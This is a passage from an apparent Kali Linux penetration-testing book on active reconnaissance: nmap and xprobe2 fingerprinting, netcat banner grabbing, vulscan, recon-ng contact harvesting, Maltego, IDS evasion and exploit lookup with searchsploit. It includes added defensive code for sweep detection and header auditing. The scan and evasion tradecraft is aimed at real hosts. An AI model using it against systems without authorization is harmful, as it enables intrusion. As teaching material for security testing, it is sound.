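    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) .*SRC=(\S+) DST=(\S+) PROTO=(\w+) .*DPT=(\d+)"
)


def parse_line(line, year=2014):
    """Return (timestamp, src, dst, proto, dport) or None for non-matching lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4), int(m.group(5))


def detect_sweeps(lines, window, threshold):
    """Return {src: peak distinct targets in any window} for sources over threshold."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, proto, dport = parsed
            events[src].append((ts, (dst, proto, dport)))

    hits = {}
    for src, evs in events.items():
        evs.sort()
        q = deque()                 # events currently inside the window
        counts = defaultdict(int)   # target -> occurrences inside the window
        peak = 0
        for ts, target in evs:
            q.append((ts, target))
            counts[target] += 1
            while q and ts - q[0][0] > window:   # evict events that fell out
                old_ts, old_target = q.popleft()
                counts[old_target] -= 1
                if counts[old_target] == 0:
                    del counts[old_target]
            peak = max(peak, len(counts))
        if peak >= threshold:
            hits[src] = peak
    return hits


# --- constructed sample log (not real traffic) ---------------------------
def _line(ts, src, dst, dport, proto="TCP"):
    return (f"{ts:%b %d %H:%M:%S} fw kernel: DROP IN=eth0 SRC={src} DST={dst} "
            f"PROTO={proto} SPT=40000 DPT={dport}")


_base = datetime(2014, 3, 11, 15, 55, 0)
SAMPLE_LOG = []
# a fast sweep: 40 ports on one host inside two seconds
for i in range(40):
    SAMPLE_LOG.append(_line(_base + timedelta(milliseconds=50 * i),
                            "198.51.100.9", "192.0.2.10", 1 + i))
# a slow sweep: one new port every five minutes
for i in range(12):
    SAMPLE_LOG.append(_line(_base + timedelta(minutes=5 * i),
                            "198.51.100.44", "192.0.2.10", 100 + i))
# an ordinary client: many hits, always the same port
for i in range(50):
    SAMPLE_LOG.append(_line(_base + timedelta(seconds=i),
                            "203.0.113.5", "192.0.2.20", 443))

if __name__ == "__main__":
    print("10 s window :", detect_sweeps(SAMPLE_LOG, timedelta(seconds=10), 20))
    print("1 h window  :", detect_sweeps(SAMPLE_LOG, timedelta(hours=1), 10))
```

The thresholds and windows here are illustrative; in practice they are tuned against the site's baseline so that load balancers and monitoring probes, which also touch many ports, do not trip the rule.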

Fingerprinting the operating system 

Determining the operating system of a remote system is conducted using two types 
of scans: 

• Active fingerprinting: The attacker sends normal and malformed packets to 
the target and records its response pattern, referred to as the fingerprint. By 
comparing the fingerprint to a local database, the operating system can be 
determined. 

• Passive fingerprinting: The attacker sniffs, or records and analyses the packet 
stream to determine the characteristics of the packets. 

Active fingerprinting is faster and more accurate than passive fingerprinting. In Kali, 
the two primary active tools are nmap and xprobe2. 

The nmap tool injects packets into the target network and analyses the response that 
it receives. In the following screenshot, the -O flag commands nmap to determine 
the operating system. Because it injects the packet into the target, the accuracy of 
the determination of the operating system by nmap is based on the number of open 
ports. It is usually effective at differentiating Windows from Unix systems, but it may 
not provide very specific information, such as differentiating between various Unix 
kernels. The following screenshot shows results from an nmap scan of a Windows 
system. Only a few ports on the target system are available for testing, so it cannot 
differentiate between Windows 7 Enterprise and Windows XP SP3: 

root@kali:~# nmap -sS -O 173.231. 

Starting Nmap 6.46 ( http://nmap.org ) at 2014-03-11 15:55 EDT 
Nmap scan report for IP-173-231- 
Host is up (0.29s latency). 
Not shown: 954 closed ports, 44 filtered ports 
PORT   STATE SERVICE 
23/tcp open  telnet 
80/tcp open  http 
Device type: general purpose 
Running: Microsoft Windows 7|XP 
OS CPE: cpe:/o:microsoft:windows_7::enterprise cpe:/o:microsoft:windows_xp::sp3 
OS details: Microsoft Windows 7 Enterprise, Microsoft Windows XP SP3 



A related program, xprobe2, uses different TCP, UDP, and ICMP packets to bypass 
firewalls and avoid detection by IDS/IPS systems. xprobe2 also uses fuzzy pattern 
matching — the operating system is not identified as definitely being one type; 
instead, it is assigned the probability of being one of several possible variants. 

As you can see in the following screenshot, this allows the tester to test 
vulnerabilities that are specific to the operating system variants; this specificity 
increases the chances of success and minimizes the risks that can occur when an 
exploit is attempted with the wrong tool. 



[+] Primary guess: 
[+] Host 199.181. Running OS: "HP UX 11.0x" (Guess probability: 95%) 
[+] Other guesses: 
[+] Host 199.181. Running OS: "OpenBSD 3.4" (Guess probability: 90%) 
[+] Host 199.181. Running OS: "OpenBSD 3.5" (Guess probability: 90%) 
[+] Host 199.181. Running OS: "OpenBSD 3.6" (Guess probability: 90%) 
[+] Host 199.181. Running OS: "OpenBSD 3.7" (Guess probability: 90%) 
[+] Host 199.181. Running OS: "Cisco IOS 11.2" (Guess probability: 86%) 



[ 78 ] 



Chapter 3 



Note that it is simple for the target system to hide the true operating system. Since 
fingerprinting software relies on packet settings, such as time-to-live or the initial 
window size, changes to these values or other user-configurable settings can change 
the tool results. Some organizations actively change these values to make the final 
stages of reconnaissance more difficult. 
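Both the exact-match style of nmap -O and the probability style of xprobe2 reduce to comparing an observed response profile against a table of signatures field by field. The following added example (not the book's code, and not nmap's or xprobe2's database) scores a constructed profile of TTL, initial window size, DF bit and TCP option order against a small illustrative signature table and returns ranked guesses with a match percentage. The second sample shows the point made in the note above: an administrator who changes only the TTL lowers the confidence, but the remaining fields still point at the same operating system, so a single tweaked value does not hide it.

```python
"""Fuzzy OS-fingerprint matching (added example; signature values are
illustrative, not copied from nmap-os-db or xprobe2)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Probe:
    ttl: int        # TTL seen in the reply (signatures store the initial value)
    window: int     # initial TCP window size
    df: bool        # Don't Fragment bit set
    options: str    # TCP option order, e.g. "MSS,NOP,WS,NOP,NOP,SACK"


# Illustrative signature table, constructed for this example.
SIGNATURES = {
    "Linux 2.6 family": Probe(64, 5840, True, "MSS,SACK,TS,NOP,WS"),
    "Windows 7":        Probe(128, 8192, True, "MSS,NOP,WS,NOP,NOP,SACK"),
    "Windows XP SP3":   Probe(128, 65535, True, "MSS,NOP,NOP,SACK"),
    "OpenBSD 3.x":      Probe(64, 16384, True, "MSS,NOP,NOP,SACK,NOP,WS,NOP,NOP,TS"),
}

# How much each field contributes; option order is the hardest to fake by accident.
WEIGHTS = {"ttl": 2, "window": 3, "df": 1, "options": 4}


def initial_ttl(observed):
    """Round an observed TTL up to the nearest common initial value (64, 128, 255)."""
    for boundary in (64, 128, 255):
        if observed <= boundary:
            return boundary
    return observed


def rank_guesses(sample):
    """Score every signature field by field; return [(name, percent)], best first."""
    total = sum(WEIGHTS.values())
    results = []
    for name, sig in SIGNATURES.items():
        score = 0
        if initial_ttl(sample.ttl) == sig.ttl:
            score += WEIGHTS["ttl"]
        if sample.window == sig.window:
            score += WEIGHTS["window"]
        if sample.df == sig.df:
            score += WEIGHTS["df"]
        if sample.options == sig.options:
            score += WEIGHTS["options"]
        results.append((name, round(100 * score / total)))
    results.sort(key=lambda r: (-r[1], r[0]))
    return results


def best_guess(sample, min_percent=70):
    """nmap-style answer: the top entry, or None when nothing is a confident match."""
    name, percent = rank_guesses(sample)[0]
    return (name, percent) if percent >= min_percent else None


if __name__ == "__main__":
    # Constructed observation a few hops away from an unmodified Windows 7 host.
    stock = Probe(ttl=120, window=8192, df=True, options="MSS,NOP,WS,NOP,NOP,SACK")
    # Same host after the administrator set the initial TTL to 64.
    tweaked = Probe(ttl=60, window=8192, df=True, options="MSS,NOP,WS,NOP,NOP,SACK")
    print(rank_guesses(stock))
    print(rank_guesses(tweaked))
```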

Determining active services 

The final goal of the enumeration portion of reconnaissance is to identify the 
services and applications that are operational on the target system. If possible, the 
attacker would want to know the service type, vendor, and version to facilitate the 
identification of any vulnerability. 

The following are some of the several techniques used to determine active services: 

• Identify default ports and services: If the remote system is identified as 
having a Microsoft operating system with port 80 open (the WWW service), 
an attacker may assume that a default installation of Microsoft IIS is installed. 
Additional testing will be used to verify this assumption (nmap). 

• Banner grabbing: This is done using tools such as amap, netcat, nmap, 
and Telnet. 

• Review default web pages: Some applications install with default 
administration, error, or other pages. If attackers access these, they will 
provide guidance on installed applications that may be vulnerable to attack. 
In the following screenshot, the attacker can easily identify the version of 
Apache Tomcat that has been installed on the target system. 

[Screenshot: the Apache Tomcat/7.0.32 default page from the Apache Software 
Foundation, with its menu (Home, Documentation, Configuration, Examples, Wiki, 
Mailing Lists, Find Help), its Recommended Reading links (Security Considerations 
HOW-TO, Manager Application HOW-TO, Clustering/Session Replication HOW-TO) 
and its Developer Quick Start section] 

[ 79 ] 




Active Reconnaissance and Vulnerability Scanning 



• Review source code: Poorly configured web-based applications may 
respond to certain HTTP requests such as HEAD or OPTIONS with a 
response that includes the web server software version, and possibly, the 
base operating system or the scripting environment in use. In the following 
screenshot, netcat is launched from the command line and used to send 
a raw HEAD request to a particular website. This request generates an error 
message (404 Not Found); however, it also identifies that the server is running 
Microsoft IIS, Version 7.5. 

root@kali:~# nc www. .ca 80 
HEAD / HTTP/1.0 

HTTP/1.1 404 Not Found 
Connection: close 
Content-Length: 1245 
Date: Wed, 12 Mar 2014 16:05:02 GMT 
Content-Type: text/html 
Server: Microsoft-IIS/7.5 
X-UrlMaster-404: Requested_404 
Set-Cookie: um_IsMobile=False; path=/; HttpOnly 
X-Powered-By: ASP.NET 
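The netcat session above is something an asset owner can repeat against their own servers to see what the headers give away. The following added example (not the book's code) does the same HEAD request in Python and, more usefully, parses the response and flags the headers that disclose the software stack, noting whether the value carries a version number. The constructed sample response is modelled on the screenshot above; `head_request` is only needed against a live host and is not exercised offline.

```python
"""Check an HTTP response for server-software disclosure (added example)."""
import re
import socket

# Constructed sample, modelled on the nc session in the text.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Connection: close\r\n"
    b"Content-Length: 1245\r\n"
    b"Date: Wed, 12 Mar 2014 16:05:02 GMT\r\n"
    b"Content-Type: text/html\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"Set-Cookie: um_IsMobile=False; path=/; HttpOnly\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"\r\n"
)

# Headers that commonly name the server, framework or runtime.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version",
                      "x-aspnetmvc-version")
VERSION_RE = re.compile(r"\d+(\.\d+)+")   # e.g. 7.5 or 2.4.41


def head_request(host, port=80, timeout=5):
    """Send the same raw HEAD request netcat sent and return the response bytes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def parse_headers(raw):
    """Return (status_line, {lower-case header name: value}) from a raw response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def disclosure_findings(raw):
    """List (header, value, carries_version) for headers that reveal the stack."""
    _, headers = parse_headers(raw)
    findings = []
    for name in DISCLOSURE_HEADERS:
        if name in headers:
            value = headers[name]
            findings.append((name, value, bool(VERSION_RE.search(value))))
    return findings


if __name__ == "__main__":
    for header, value, versioned in disclosure_findings(SAMPLE_RESPONSE):
        flag = "version disclosed" if versioned else "product disclosed"
        print(f"{header}: {value}  [{flag}]")
```

A finding with `carries_version` set is the one to act on first: a bare product name tells an observer little beyond what the port already implied, whereas an exact version lets a vulnerability database be searched directly, which is the next step described later in this chapter.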



Employing comprehensive 
reconnaissance applications 

Although Kali contains multiple tools to facilitate reconnaissance, many of the tools 
contain features that overlap, and importing data from one tool into another is 
usually a complex manual process. Most testers select a subset of tools and invoke 
them with a script. 

Comprehensive tools focused on reconnaissance were originally command-line tools 
with a defined set of functions; one of the most commonly used was Deepmagic 
Information Gathering Tool (DMitry). DMitry could perform whois lookups, 
retrieve netcraft.com information, search for subdomains and e-mail addresses, and 
perform TCP scans. Unfortunately, it was not extensible beyond these functions. 

Recent advances have created comprehensive framework applications that combine 
passive and active reconnaissance; we'll review nmap, recon-ng, and Maltego. 

nmap 

Traditionally, nmap was perceived as a simple mapping tool that provided data 
on host and port availability, as well as some additional data such as the probable 
operating system of target devices. 

The Nmap Scripting Engine (NSE) has transformed nmap into a tool that can 
conduct passive and active reconnaissance, and even perform basic vulnerability 
scanning (a full list of scripts is available at http://nmap.org/nsedoc/). 

Because scripts are written in the Lua scripting language, it is easy for the 
penetration testing community to modify and release scripts. Presently, scripted 
functions include the following: 

• Reconnaissance of IPv4 and IPv6 DNS data 

• Identifying the presence of web application firewalls, IDS, IPS, and other 
protective controls 

• Testing the firewall rulesets (via firewalk) and attempting to bypass 
the firewall 

• Harvesting user names from target and online sites 

• Brute-force guessing of passwords against a variety of services 
and applications 

• Crawling the target network to identify network shares 

• Extracting of EXIF metadata from images in a defined website 

• Geographical localization of IP addresses 

• Conducting network attacks such as IPv6 packet flooding 

• Vulnerability scanning, including fuzzing and SQL injection testing 

As you can see, the ability to script nmap activities using an extensible language such 
as Lua has increased the importance of this tool. 

A useful script is Marc Ruef's vulscan (http://www.computec.ch/mruef/ 
software/nmap_nse_vulscan-1.0.tar.gz), which combines the fingerprinting 
feature of nmap (using the -sV flag) with lookups against major vulnerability 
databases, such as MITRE, OSVDB, and Security Focus. 

Once you have downloaded the script package, untar the file and move the script 
files to /usr/share/nmap/scripts. 

To invoke one of the scripts from the command line, use the --script flag, and 
then identify the script name. One script that is frequently used is nmap's general 
vulnerability scanner, launched using the following command: 

root@kali:~# nmap -sV --script=vulscan.nse digitaldefence.ca 

In this particular case, the vulnerability scan did not identify any vulnerabilities with 
known exploits, as shown in the following screenshot: 



root@kali:~# nmap -sV --script=vulscan digitaldefence.ca 

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-12 21:27 EDT 
Nmap scan report for digitaldefence.ca (54.236.190.114) 
Host is up (0.0069s latency). 
rDNS record for 54.236.190.114: ec2-54-236-190-114.compute-1.amazonaws.com 
Not shown: 997 filtered ports 
PORT   STATE SERVICE VERSION 
22/tcp open  sftp    ProFTPD mod_sftp 0.9.8 
| vulscan: scipvuldb - http://www.scip.ch/en/?vuldb (0 findings): 
| No findings 
| 
| cve - http://cve.mitre.org (0 findings): 
| No findings 
| 
| osvdb - http://www.osvdb.org (0 findings): 
| No findings 
| 
| securityfocus - http://www.securityfocus.com/bid/ (0 findings): 
| No findings 




A must-have script is the SpiderLabs script to screenshot web services. 
It requires the wkhtmltoimage tool to be downloaded (http:// 
wkhtmltopdf.googlecode.com) and placed in the /usr/local/ 
bin folder. The screenshot script itself should then be downloaded 
(https://github.com/SpiderLabs/Nmap-Tools/blob/ 
master/NSE/http-screenshot.nse) and placed in /usr/local/ 
share/nmap/scripts. When invoked, this script produces a visual 
record of all the identified web services, making it easier to select a 
target for testing later. 



The recon-ng framework 

The recon-ng framework is an open source framework for conducting 
reconnaissance (passive and active). 

Like the Metasploit Framework and Social Engineer Toolkit, recon-ng uses a 
modular framework. Each module is a customized cmd interpreter, preconfigured 
to perform a specific task. 

The recon-ng framework and its modules are written in Python, allowing 
penetration testers to easily build or alter modules to facilitate testing. 
The recon-ng tool leverages third-party APIs to conduct some assessments; this 
additional flexibility means that some activities undertaken by recon-ng may be 
tracked by those parties. Users can specify a custom UserAgent string or proxy 
requests to minimize alerting the target network. 

All data collected by recon-ng is placed in a database, allowing you to create 
various reports against the stored data. The user can select one of the report 
modules to automatically create either a CSV report, or an HTML report. 

To use recon, perform the following steps: 

1. If recon-ng is not installed on your version of Kali, use the 
following command: 

apt-get install recon-ng 

2. To start the application, enter recon-ng at the prompt as shown in 
the following screenshot. The start screen will indicate the number of 
modules present, and the help command will show the commands 
available for navigation. 



root@kali:~# recon-ng 

[recon-ng ASCII banner] 

[recon-ng v1.31 Copyright (C) 2013, Tim Tomes (@LaNMaSteR53)] 

[59] Recon modules 
[6] Discovery modules 
[3] Reporting modules 
[1] Experimental modules 

recon-ng > help 

Commands (type [help|?] <topic>): 

back        Exits current prompt level 
banner      Displays the banner 
exit        Exits current prompt level 
help        Displays this menu 
info        Displays module information 
keys        Manages framework API keys 
load        Loads selected module 
query       Queries the database 
record      Records commands to a resource file 
reload      Reloads all modules 
resource    Executes commands from a resource file 
run         Not available 
search      Searches available modules 
set         Sets global options 
shell       Executed shell commands 
show        Shows various framework items 
use         Loads selected module 
3. To show the available modules, type show at the recon-ng> prompt. To load 
a specific module, type load followed by the name of the module. Hitting 
the tab key while typing will autocomplete the command. If the module has 
a unique name, you can type in the unique part of the name, and the module 
will be loaded without entering the full path. 

Entering info, as shown in the following screenshot, will provide you 
with information on how the module works, and where to obtain API keys 
if required. 

recon-ng > load recon/contacts/gather/http/web/jigsaw 
recon-ng [jigsaw] > info 

Name: Jigsaw Contact Enumerator 
Path: modules/recon/contacts/gather/http/web/jigsaw.py 
Author: Tim Tomes (@LaNMaSteR53) 

Description: 
Harvests contacts from Jigsaw.com and updates the 'contacts' table of the 
database with the results. 

Options: 
Name      Current Value  Req  Description 
COMPANY                  yes  target company name 
KEYWORDS                 no   additional keywords to identify company 

recon-ng [jigsaw] > 
4. Once the module is loaded, use the set command to set the options, and then 
enter run to execute, as shown in the following screenshot: 

recon-ng [jigsaw] > set company digitaldefence 
COMPANY => digitaldefence 
recon-ng [jigsaw] > run 
[*] Gathering Company IDs... 
[*] Query: http://www.jigsaw.com/FreeTextSearchCompany.xhtml?opCode=search&freeText=digitaldefence+ 
[*] Unique Company Match Found: 362937 
[*] Gathering Contact IDs for Company '362937'... 
[*] Query: http://www.jigsaw.com/SearchContact.xhtml?rpage=1&opCode=showCompDir&companyId=362937 
[*] Query: http://www.jigsaw.com/SearchContact.xhtml?rpage=2&opCode=showCompDir&companyId=362937 
[*] Gathering Contacts... 
[*] [7805728] Robert Beggs - Chief Executive Officer (Burlington, ON - Canada) 



In general, testers rely on recon-ng to do the following: 

• Harvest contacts using whois, jigsaw, linkedin, and twitter 
(use the mangle module to extract and present e-mail data) 

• Identify hosts 

• Identify geographical locations of hosts and individuals using hostop, 
ipinfodb, maxmind, uniapple, and wigle 

• Identify host information using netcraft and related modules 

• Identify account and password information that has previously been 
compromised and leaked onto the Internet (the pwnedlist modules, 
wascompanyhacked, xssed, and punkspider) 

Maltego 

Maltego (www.paterva.com) is an open source intelligence and forensics application. 
The community version included with Kali sets limits on the size of searches; 
however, it is an excellent tool for visualizing relationships among data that use 
data mining and link analysis. 

Maltego allows you to enumerate personal information, linking a particular person 
with a company, e-mail addresses, websites, social networking groups, and phone 
numbers. It also facilitates passive and active reconnaissance of whois information, 
domain names, DNS information, IP addresses, and netblocks. 

1. To open the application, enter maltego at a command prompt. The first time 
you open it, you will be required to register and verify your e-mail address 
with Paterva. 

2. Once you have completed registration and updating of transforms, 
you will be presented with a multipaned GUI that allows you to 
examine the connections between various data objects, as shown in 
the following screenshot: 




Maltego relies on a series of transforms or modules that are stored in a 
palette on the left-hand side of the application. Transforms are selected by 
picking them from the column on the left and then dragging them into the 
centre of the application. 

By default, the icon may be called paterva.com when initially selected; 
however, you can use the data manipulation areas in the right-hand column 
to rename and change data. 

Several different transforms exist in the community edition; these are 
sorted into several groups such as Devices, Infrastructure, Personal, 
Locations, Penetration Testing, and Social Network, as shown in the 
following screenshot: 
[Palette screenshot] 

Domain - An internet domain 
MX Record - A DNS mail exchange record 
NS Record - A DNS name server record 
Netblock - An internet Autonomous System (AS) 
URL - An internet Uniform Resource Locator (URL) 
Website - An internet website 

Personal 
Locations 
Penetration Testing 
Social Network 



3. Drag the appropriate transform onto the work sheet and right-click to reveal 
the transformations that will be completed against that transform's identity. 
Keep in mind that if you select the All option, processing will take 
a significant amount of time. 

The ability to analyze relationships is particularly useful in performing social 
engineering attacks. For example, if the target's website contains multiple links to 
another website, an attacker could use this relationship for a phishing attack. 
Vulnerability scanning 

Vulnerability scanning employs automated processes and applications to 
identify vulnerabilities in a network, system, operating system, or application 
that may be exploitable. 

When performed correctly, a vulnerability scan delivers an inventory of devices 
(both authorized and rogue devices), known vulnerabilities that have been actively 
scanned for, and usually a confirmation of how compliant the devices are with 
various policies and regulations. 

Unfortunately, vulnerability scans are loud — they deliver multiple packets that are 
easily detected by most network controls and make stealth almost impossible to 
achieve. They also suffer from the following additional limitations: 

• For the most part, vulnerability scanners are signature based — they can only 
detect known vulnerabilities, and only if there is an existing recognition 
signature that the scanner can apply to the target. To a penetration tester, 
the most effective scanners are open source and allow the tester to rapidly 
modify code to detect new vulnerabilities. 

• Scanners produce large volumes of output, frequently containing false- 
positive results that can lead a tester astray; in particular, networks with 
different operating systems can produce false-positives with a rate as high as 
seventy percent. 

• Scanners may have a negative impact on the network — they can create 
network latency or cause the failure of some devices (refer to the Network 
Scanning Watch List at www.digininja.org, for devices known to fail as a 
result of vulnerability testing). 

• In certain jurisdictions, scanning is considered as hacking, and may constitute 
an illegal act. 

There are multiple commercial and open source products that perform vulnerability 
scans. In Kali, scanning tools can be found in the Vulnerability Analysis 
submenu, as well as the Web Vulnerability Scanners menu; however, the primary 
vulnerability scanner is Open Vulnerability Assessment System (OpenVAS). 

Kali supports the installation of additional scanners. If it is decided to sacrifice 
stealth for completeness during testing, always employ at least two different 
scanners to minimize false-positive results. Recommended scanners include 
Nexpose (www.rapid7.com) and the venerable Nessus (www.nessus.org). 
Summary 

During active reconnaissance, the attackers face a very real chance of their activities 
being identified, putting them at risk. This must be balanced against the need to map 
a network, find open ports, and determine the operating system and applications 
that are installed. 

To reduce risks, attackers must adopt stealthy scanning techniques. Manual 
approaches are used to create slow scans; however, this approach is not always 
effective. Therefore, attackers take advantage of tools such as the Tor network and 
various proxying applications to hide their identity. 

In the next chapter, we will focus on analyzing the data from the reconnaissance 
stages and from other sources, and using it to plan and execute a remote exploit 
against a target network or system. We will review various attack techniques and 
tools and focus on how to ensure that the exploit cannot be detected by normal 
means. We will also examine remote exploitation as a continuous process — once you 
have compromised one target, how to leverage that success to pivot to new targets. 
The goal of passive and active reconnaissance is to identify the exploitable security 
flaws that are most likely to support the tester's or attacker's objective (denial of 
service, theft, or modification of data). The exploit phase of the kill chain focuses on 
creating the access to achieve the objective — either stopping the access to a target by 
creating a denial of service or the more common approach of establishing persistent 
access to the target from the attacker. 

The penetration tester must be concerned with the following aspects of the 
exploit phase: 

• Was the target fully characterized? If the attacker does not understand the 
network and host architecture of the target, the attack will fail and there will 
be an increased risk of detection. 

• Is the exploit well known, with defined actions on the target system? 

An uncharacterized exploit could have unintended consequences when 
employed and the resulting damage could have a negative impact on the 
testing process. Testers should validate all exploits in a known setting prior 
to use. 

• Is the exploit being conducted from a remote location or is it local on the 
target system? A remote exploit is safer for the attacker because the chances 
of being positively identified are lesser; however, a local exploit gives the 
attacker more control over the exploit's action and reduces the possibility 
of detection. 

• What are the required post-exploit activities? If the attacker needs to 
exfiltrate data from the target, then the exploit must support establishing 
an interactive connection. 

• Is persistent access to the compromised system required, or is the 
compromise going to be short term? This will drive the requirement for 
a stealthy approach. 
Thousands of exploitable vulnerabilities have been identified, and most are 
associated with at least one proof-of-concept code or technique to allow the system to 
be compromised. Nevertheless, the underlying principles that govern success are the 
same across networks, operating systems, and applications. 

In this chapter you will learn: 

• Threat modeling 

• Using online and local vulnerability resources 

• Exploiting a remote target using the Metasploit Framework 

• Exploiting multiple targets with Armitage 

• Bypassing IDS and antivirus detection 

Threat modeling 

The passive and active reconnaissance phases map the target network and 
system and identify vulnerabilities that may be exploitable to achieve the attacker's 
objective. During this stage of the attacker's kill chain, there is a strong bias for 
action — testers want to immediately launch exploits and demonstrate that they can 
compromise the target. However, an unplanned attack may not be the most effective 
means of achieving the object, and it may sacrifice the stealth that is needed to 
achieve the objective of the attack. 

Penetration testers have adopted (formally or informally) a process known as 
threat modeling, which was originally developed by network planners to develop 
defensive countermeasures against an attack. 

Penetration testers and attackers have turned the defensive threat modeling 
methodology on its head to improve the success of an attack. Offensive threat 
modeling is a formal approach that combines the results of reconnaissance and 
research to develop an attack strategy. An attacker has to consider the available 
targets and identify the type of targets listed as follows: 

• Primary targets: When compromised, these targets will immediately support 
the objective. 

• Secondary targets: These targets may provide information (security controls, 
password and logging policies, and local and domain administrator names 
and passwords) to support an attack or allow access to a primary target. 

• Tertiary targets: These targets may be unrelated to the testing or attack 
objective, but are relatively easy to compromise and may provide 
information or a distraction from the actual attack. 
For each target type, the tester has to determine the approach to be used. A single 
vulnerability can be attacked using stealth techniques or multiple targets can be 
attacked using a volume of attacks in order to rapidly exploit a target. If a large-scale 
attack is implemented, the noise in the defender's control devices will frequently cause 
them to minimize logging on the router and firewall or even fully disable them. 

The approach to be used will guide the selection of the exploit. Generally, attackers 
follow an attack tree methodology when creating a threat model, as shown in the 
following diagram: 



[Attack tree diagram; only one of its nodes survives in this copy: 
"Exploit vulnerability in web access interface"] 



The attack tree approach allows the tester to easily visualize the attack options that 
are available and the alternative options that can be employed if a selected attack is 
not successful. Once an attack tree has been generated, the next step of the exploit 
phase is to identify the exploits that may be used to compromise vulnerabilities in 
the target. 
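An attack tree is a structure that can be evaluated, not just drawn. The following is an added example (not the book's code): OR nodes are alternatives, AND nodes are steps that must all succeed, leaves carry a constructed effort figure and a constructed probability of detection, and the evaluator returns the cheapest route to the root together with its combined detection risk and the ranked alternatives. The tree is a hypothetical one built around the single node visible in the diagram above; the numbers are illustrative. Read from the defender's side, the cheapest path is where controls and monitoring pay off first.

```python
"""Attack-tree evaluation (added example; tree and figures are constructed)."""
from dataclasses import dataclass, field
from typing import List


@dataclass
class Node:
    name: str
    kind: str = "leaf"        # "leaf", "or" (alternatives) or "and" (all required)
    cost: float = 0.0         # effort for a leaf, in constructed units
    noise: float = 0.0        # probability that a leaf action is detected, 0..1
    children: List["Node"] = field(default_factory=list)


def evaluate(node):
    """Return (cost, p_detect, leaves) for the cheapest way to achieve node.

    OR: take the cheapest child.  AND: every child is needed, so costs add and
    the chance of staying undetected is the product over the children.
    """
    if node.kind == "leaf":
        return node.cost, node.noise, [node.name]
    results = [evaluate(child) for child in node.children]
    if node.kind == "or":
        return min(results, key=lambda r: r[0])
    cost = sum(r[0] for r in results)
    p_undetected = 1.0
    for _, p_detect, _ in results:
        p_undetected *= 1.0 - p_detect
    leaves = [name for r in results for name in r[2]]
    return cost, 1.0 - p_undetected, leaves


def alternatives(node):
    """For an OR node, every option as (name, cost, p_detect), cheapest first."""
    options = [(child.name, *evaluate(child)[:2]) for child in node.children]
    return sorted(options, key=lambda o: o[1])


# Hypothetical tree; the first leaf is the node visible in the book's diagram.
TREE = Node("Gain access to customer database", "or", children=[
    Node("Exploit vulnerability in web access interface", cost=4, noise=0.6),
    Node("Phish an administrator", "and", children=[
        Node("Harvest e-mail addresses", cost=1, noise=0.1),
        Node("Send phishing e-mail to harvested addresses", cost=2, noise=0.3),
    ]),
    Node("Brute-force VPN credentials", cost=5, noise=0.9),
])

if __name__ == "__main__":
    cost, p_detect, leaves = evaluate(TREE)
    print(f"cheapest path: {leaves} cost={cost} p_detect={p_detect:.2f}")
    for name, c, p in alternatives(TREE):
        print(f"  option: {name:45s} cost={c} p_detect={p:.2f}")
```

Swapping the key in `evaluate`'s `min` from cost to detection probability gives the stealthiest path instead of the cheapest, which is the trade-off the chapter keeps returning to.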

Using online and local vulnerability 
resources 

Together, passive and active reconnaissance identifies the attack surface of the 
target, that is, the total number of points that can be assessed for vulnerabilities. 

A server with just an operating system installed can only be exploited if there are 
vulnerabilities in that particular operating system; however, the number of potential 
vulnerabilities increases with each application that is installed. 
Penetration testers and attackers must find the particular exploits that will 
compromise known and suspected vulnerabilities. The first place to start the search 
is at vendor sites; most hardware and application vendors release information about 
vulnerabilities when they release patches and upgrades. If an exploit for a particular 
weakness is known, most vendors will highlight this to their customers. Although 
their intent is to allow customers to test for the presence of the vulnerability 
themselves, attackers and penetration testers will take advantage of this information 
as well. 

Other online sites that collect, analyze, and share information about vulnerabilities 
are as follows: 

• The National Vulnerability Database that consolidates all public 
vulnerability data released by the US Government available at 
http://web.nvd.nist.gov/view/vuln/search 

• Secunia available at http://secunia.com/community/ 

• Open Source Vulnerability Database Project (OSVDB) available at 
http://www.osvdb.org/search/advsearch 

• Packetstorm security available at http://packetstormsecurity.com/ 

• SecurityFocus available at http://www.securityfocus.com/vulnerabilities 

• Inj3ct0r available at http://1337day.com/ 

• The Exploit Database maintained by Offensive Security available at 
http://www.db-exploit.com 

The exploit database is also copied locally to Kali and it can be found in the 
/usr/share/exploitdb directory. Before using it, make sure that it has been updated 
using the following command: 

cd /usr/share/exploitdb 
wget http://www.exploit-db.com/archive.tar.bz2 
tar -xvjf archive.tar.bz2 
rm archive.tar.bz2 

To search the local copy of exploitdb, open a terminal window and enter 
searchsploit and the desired search term(s) in the command prompt. This will 
invoke a script that searches a database file (.csv) that contains a list of all exploits. 
The search will return a description of known vulnerabilities as well as the path to 
a relevant exploit. The exploit can be extracted, compiled, and run against specific 
vulnerabilities. Take a look at the following screenshot, which shows the description 
of the vulnerabilities: 
Description 
Bulletproof FTP Server 2.4.0.31 Local Privilege Escalation Exploit 
Bulletproof FTP Client 2.45 Remote Buffer Overflow Exploit (PoC) 
Bulletproof FTP Client 2.63 Local Heap Overflow PoC 
Bulletproof FTP Client (.bps File) Local Stack Overflow PoC 
Bulletproof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH) 
BulletProof FTP 2.63 b56 Client Malformed '.bps' File Stack Buffer Overflow 
BulletProof FTP Client 2010 - Buffer Overflow Vulnerability 

Path 
/windows/remote/2530.py 
/windows/dos/7571.txt 
/windows/dos/7589.pl 
/windows/local/8420.py 
/windows/remote/9998.c 
/windows/dos/18716.txt 




The search script scans each line in the CSV file from left to right, so
